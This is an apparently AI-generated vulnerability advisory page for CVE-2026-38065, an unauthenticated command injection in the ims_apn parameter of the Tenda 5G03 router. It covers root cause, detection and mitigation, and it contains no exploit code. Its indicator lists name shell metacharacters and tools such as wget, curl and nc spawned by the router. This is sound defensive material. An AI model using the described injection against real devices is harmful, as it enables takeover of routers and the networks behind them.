Skip to main content
A Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. Six years running.Find Out Why
CVE Vulnerability Database
Vulnerability Database/CVE-2026-38065

CVE-2026-38065: Tenda 5G03 RCE Vulnerability

CVE-2026-38065 is a command injection flaw in Tenda 5G03 V05.03.02.04 that enables remote code execution through the ims_apn parameter. This article covers technical details, affected versions, and mitigation steps.

Published:

CVE-2026-38065 Overview

CVE-2026-38065 is a command injection vulnerability affecting the Tenda 5G03 router running firmware version V05.03.02.04 (Version 1.0). The flaw resides in the action_ims_on_with_apn function, where the ims_apn parameter is passed to a system shell without sanitization. Unauthenticated attackers with network access to the device can inject arbitrary operating system commands. Successful exploitation grants full control of the router, enabling traffic interception, lateral movement, and persistent compromise of the network perimeter. The vulnerability is tracked under CWE-78 (OS Command Injection).

Critical Impact

Unauthenticated remote attackers can execute arbitrary OS commands as root on affected Tenda 5G03 routers, fully compromising the device and the networks it serves.

Affected Products

  • Tenda 5G03 router
  • Firmware version V05.03.02.04
  • Version 1.0 hardware revision

Discovery Timeline

  • 2026-06-15 - CVE-2026-38065 published to NVD
  • 2026-06-17 - Last updated in NVD database

Technical Details for CVE-2026-38065

Vulnerability Analysis

The vulnerability is an OS command injection flaw in the Tenda 5G03 web management interface. The action_ims_on_with_apn handler accepts the ims_apn parameter from HTTP requests and incorporates the value directly into a shell command string. Because the parameter is not validated, escaped, or restricted to expected APN characters, attackers can append shell metacharacters such as ;, |, &, or backticks to break out of the intended command context. The injected payload executes with the privileges of the web server process, which on consumer routers typically runs as root. The current EPSS estimate places the probability of exploitation activity in the 67th percentile, reflecting active attacker interest in similar IoT command injection issues.

Root Cause

The root cause is the absence of input validation and unsafe command construction in action_ims_on_with_apn. Attacker-controlled data flows directly from the HTTP request into a shell interpreter, satisfying the classic conditions for CWE-78. The handler treats the ims_apn value as trusted configuration data rather than untrusted user input.

Attack Vector

Exploitation requires only network reachability to the router's web interface. No authentication or user interaction is required. An attacker sends a crafted HTTP request to the vulnerable endpoint with shell metacharacters embedded in the ims_apn parameter. The injected commands run immediately on the device, allowing the attacker to spawn reverse shells, modify firewall rules, dump credentials, or recruit the router into a botnet. A proof-of-concept is publicly hosted in the GitHub PoC Repository.

No verified exploit code is reproduced here. See the linked PoC repository for technical details on request structure and payload formatting.

Detection Methods for CVE-2026-38065

Indicators of Compromise

  • Outbound connections from the router management interface to unfamiliar IP addresses, especially over non-standard ports.
  • HTTP POST requests targeting endpoints that invoke action_ims_on_with_apn with shell metacharacters (;, |, &, `, $()) in the ims_apn field.
  • Unexpected processes such as sh, wget, curl, tftp, or nc spawned by the router's HTTP daemon.
  • Modified firewall, NAT, or DNS configurations that were not initiated by an administrator.

Detection Strategies

  • Inspect HTTP traffic to the router's LAN-side management interface for parameter values containing shell control characters.
  • Correlate router configuration changes with administrative session logs to identify out-of-band modifications.
  • Monitor DNS resolution from the router for queries to known malware command-and-control infrastructure.

Monitoring Recommendations

  • Forward router syslog and web access logs to a centralized SIEM for long-term retention and analysis.
  • Alert on any inbound connection attempts to the router's management interface originating from WAN-facing networks.
  • Baseline normal egress traffic from the router and alert on deviations such as new outbound TCP sessions initiated by the device itself.

How to Mitigate CVE-2026-38065

Immediate Actions Required

  • Disable remote (WAN-side) administration on the Tenda 5G03 device until a vendor patch is available.
  • Restrict access to the LAN management interface using network segmentation and ACLs so only trusted administrative hosts can reach it.
  • Change administrator credentials and review router configuration for unauthorized changes such as DNS hijacking or port forwards.
  • Treat any device confirmed exploited as fully compromised and perform a factory reset followed by reconfiguration from a known-good baseline.

Patch Information

At the time of publication, no vendor advisory or firmware update addressing CVE-2026-38065 has been listed in the enriched data. Monitor Tenda's official support channels for a firmware release that supersedes V05.03.02.04 and remediates the action_ims_on_with_apn handler.

Workarounds

  • Place the router behind an upstream firewall that blocks unsolicited inbound traffic to the management interface.
  • Disable any unused services and features on the device, particularly IMS/APN configuration endpoints if not required.
  • If the device cannot be isolated or patched, replace it with a supported router that receives active security updates.

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne